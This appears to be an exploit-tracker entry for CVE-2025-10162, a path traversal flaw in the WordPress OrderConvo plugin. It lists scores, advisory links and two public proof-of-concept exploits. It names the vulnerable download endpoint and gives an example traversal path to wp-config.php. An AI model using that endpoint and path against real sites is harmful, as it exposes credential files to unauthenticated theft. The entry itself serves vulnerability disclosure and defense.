CVE-2025-10162

HIGH NUCLEI

WooCommerce: OrderConvo <14 - Path Traversal

Title source: llm
STIX 2.1

Exploitation Summary

EIP tracks 2 public exploits for CVE-2025-10162. PoCs published by Diamorphine, diamorphine666. A Nuclei detection template is also available.

AI-analyzed exploit summary This exploit demonstrates a path traversal vulnerability in WordPress OrderConvo plugin (CVE-2025-10162) by crafting a malicious request to the `wp-json/wooconvo/v1/download-file` endpoint, allowing unauthorized file reads (e.g., `wp-config.php`).

Description

The Admin and Customer Messages After Order for WooCommerce: OrderConvo WordPress plugin before 14 does not validate the path of files to be downloaded, which could allow unauthenticated attacker to read/download arbitrary files via a path traversal attack

Exploits (2)

exploitdb WORKING POC
by Diamorphine · pythonwebappsmultiple
https://www.exploit-db.com/exploits/52607

This exploit demonstrates a path traversal vulnerability in WordPress OrderConvo plugin (CVE-2025-10162) by crafting a malicious request to the `wp-json/wooconvo/v1/download-file` endpoint, allowing unauthorized file reads (e.g., `wp-config.php`).

Classification
Working Poc 95%
Attack Type
Info Leak
Complexity
Trivial
Reliability
Reliable
Target: WordPress OrderConvo plugin v13.5
No auth needed
Prerequisites: Target URL · Path traversal sequence (e.g., ../../../../wp-config.php)
devstral-2 · analyzed Jun 02, 2026 Full analysis →
github WORKING POC
by diamorphine666 · pythonpoc
https://github.com/diamorphine666/CVE-2025-10162-Exploit

This is a functional exploit for CVE-2025-10162, a path traversal vulnerability in WordPress OrderConvo plugin versions < 14. It leverages an unauthenticated endpoint to read arbitrary files from the server.

Classification
Working Poc 95%
Attack Type
Info Leak
Complexity
Trivial
Reliability
Reliable
Target: WordPress OrderConvo plugin < 14
No auth needed
Prerequisites: Target running vulnerable WordPress OrderConvo plugin · Network access to the target
devstral-2 · analyzed May 31, 2026 Full analysis →

Nuclei Templates (1)

WordPress OrderConvo < 14 - Path Traversal
HIGHVERIFIEDby 0x_Akoko

References (1)

Core 1
Core References
Third Party Advisory exploit vdb-entry technical-description
https://wpscan.com/vulnerability/f878615d-955d-4365-87e0-6c928f548986/

Scores

CVSS v3 7.5
EPSS 0.3920
EPSS Percentile 97.4%
Attack Vector NETWORK
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

CISA SSVC

Vulnrichment
Exploitation poc
Automatable yes
Technical Impact partial

Details

Status published
Products (1)
Unknown/Admin and Customer Messages After Order for WooCommerce: OrderConvo < 14
Published Oct 07, 2025
Tracked Since Feb 18, 2026